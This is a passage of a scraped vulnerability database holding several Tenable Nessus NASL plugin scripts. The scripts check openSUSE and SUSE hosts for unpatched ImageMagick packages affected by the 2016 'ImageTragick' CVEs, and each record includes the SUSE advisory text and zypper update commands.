fix\nissues tracked in CVE-2016-3714, CVE-2016-3715, CVE-2016-3716,\nCVE-2016-3717, CVE-2016-3718\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978061\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ImageMagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-PerlMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-PerlMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-debugsource-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-devel-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-extra-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-extra-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagick++-6_Q16-5-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagick++-6_Q16-5-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagick++-devel-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagickCore-6_Q16-2-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagickCore-6_Q16-2-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagickWand-6_Q16-2-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagickWand-6_Q16-2-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"perl-PerlMagick-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"perl-PerlMagick-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"ImageMagick-devel-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-5-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-5-debuginfo-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagick++-devel-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-2-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-2-debuginfo-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-2-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-2-debuginfo-32bit-6.8.9.8-18.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-debuginfo / ImageMagick-debugsource / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:56:38", "description": "This update for ImageMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Several coders were vulnerable to remote code execution attacks, these coders have now been disabled by default but can be re-enabled by editing '/etc/ImageMagick-*/policy.xml' (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering leads to (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral' pseudo protocol which deletes files after reading.\n\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo protocol with any extension in any folder.\n\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label' pseudo protocol to get content of the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP GET or FTP request.\n\nBugs fixed :\n\n - Use external svg loader (rsvg)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-09T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : ImageMagick (SUSE-SU-2016:1260-1) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:ImageMagick", "p-cpe:/a:novell:suse_linux:ImageMagick-debuginfo", "p-cpe:/a:novell:suse_linux:ImageMagick-debugsource", "p-cpe:/a:novell:suse_linux:libmagick%2b%2b-6_q16", "p-cpe:/a:novell:suse_linux:libmagick%2b%2b-6_q16-3-debuginfo", "p-cpe:/a:novell:suse_linux:libMagickCore-6_Q16", "p-cpe:/a:novell:suse_linux:libMagickCore-6_Q16-1", "p-cpe:/a:novell:suse_linux:libMagickCore-6_Q16-1-debuginfo", "p-cpe:/a:novell:suse_linux:libMagickWand-6_Q16", "p-cpe:/a:novell:suse_linux:libMagickWand-6_Q16-1-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-1260-1.NASL", "href": "https://www.tenable.com/plugins/nessus/90996", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1260-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90996);\n script_version(\"2.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : ImageMagick (SUSE-SU-2016:1260-1) (ImageTragick)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ImageMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Several coders were vulnerable to remote code execution\n attacks, these coders have now been disabled by default\n but can be re-enabled by editing\n '/etc/ImageMagick-*/policy.xml' (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering\n leads to (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using\n ImageMagick's 'ephemeral' pseudo protocol which deletes\n files after reading.\n\n - CVE-2016-3716: Possible file moving by using\n ImageMagick's 'msl' pseudo protocol with any extension\n in any folder.\n\n - CVE-2016-3717: Possible local file read by using\n ImageMagick's 'label' pseudo protocol to get content of\n the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery\n (SSRF) to make HTTP GET or FTP request.\n\nBugs fixed :\n\n - Use external svg loader (rsvg)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3714/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3715/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3716/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3717/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3718/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161260-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0fa76cf4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP1 :\n\nzypper in -t patch SUSE-SLE-WE-12-SP1-2016-733=1\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2016-733=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP1-2016-733=1\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2016-733=1\n\nSUSE Linux Enterprise Server 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP1-2016-733=1\n\nSUSE Linux Enterprise Server 12 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-2016-733=1\n\nSUSE Linux Enterprise Desktop 12-SP1 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2016-733=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2016-733=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ImageMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ImageMagick-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libMagick++-6_Q16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libMagick++-6_Q16-3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libMagickCore-6_Q16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libMagickCore-6_Q16-1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libMagickCore-6_Q16-1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libMagickWand-6_Q16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libMagickWand-6_Q16-1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0/1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ImageMagick-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ImageMagick-debugsource-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libMagickCore-6_Q16-1-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libMagickCore-6_Q16-1-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libMagickWand-6_Q16-1-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libMagickWand-6_Q16-1-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ImageMagick-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ImageMagick-debugsource-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libMagickCore-6_Q16-1-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libMagickCore-6_Q16-1-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libMagickWand-6_Q16-1-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libMagickWand-6_Q16-1-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ImageMagick-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ImageMagick-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ImageMagick-debugsource-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-3-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-3-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-32bit-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-debuginfo-32bit-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-1-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-1-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"ImageMagick-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"ImageMagick-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"ImageMagick-debugsource-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-3-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-3-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-32bit-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-debuginfo-32bit-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-1-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-1-debuginfo-6.8.8.1-19.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:56:59", "description": "This update for ImageMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Several coders were vulnerable to remote code execution attacks, these coders have now been disabled by default but can be re-enabled by editing '/etc/ImageMagick-*/policy.xml' (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering leads to (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral' pseudo protocol which deletes files after reading.\n\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo protocol with any extension in any folder.\n\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label' pseudo protocol to get content of the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP GET or FTP request.\n\nBugs fixed :\n\n - Use external svg loader (rsvg)\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-09T00:00:00", "type": "nessus", "title": "openSUSE Security Update : ImageMagick (openSUSE-2016-574) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ImageMagick", "p-cpe:/a:novell:opensuse:ImageMagick-debuginfo", "p-cpe:/a:novell:opensuse:ImageMagick-debugsource", "p-cpe:/a:novell:opensuse:ImageMagick-devel", "p-cpe:/a:novell:opensuse:ImageMagick-devel-32bit", "p-cpe:/a:novell:opensuse:ImageMagick-extra", "p-cpe:/a:novell:opensuse:ImageMagick-extra-debuginfo", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-6_q16-3", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-6_q16-3-32bit", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-6_q16-3-debuginfo", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-6_q16-3-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-devel", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-devel-32bit", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-32bit", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-debuginfo", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-32bit", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-debuginfo", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-debuginfo-32bit", "p-cpe:/a:novell:opensuse:perl-PerlMagick", "p-cpe:/a:novell:opensuse:perl-PerlMagick-debuginfo", "cpe:/o:novell:opensuse:42.1"], "id": "OPENSUSE-2016-574.NASL", "href": "https://www.tenable.com/plugins/nessus/90986", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-574.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90986);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"openSUSE Security Update : ImageMagick (openSUSE-2016-574) (ImageTragick)\");\n script_summary(english:\"Check for the openSUSE-2016-574 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ImageMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Several coders were vulnerable to remote code execution\n attacks, these coders have now been disabled by default\n but can be re-enabled by editing\n '/etc/ImageMagick-*/policy.xml' (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering\n leads to (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using\n ImageMagick's 'ephemeral' pseudo protocol which deletes\n files after reading.\n\n - CVE-2016-3716: Possible file moving by using\n ImageMagick's 'msl' pseudo protocol with any extension\n in any folder.\n\n - CVE-2016-3717: Possible local file read by 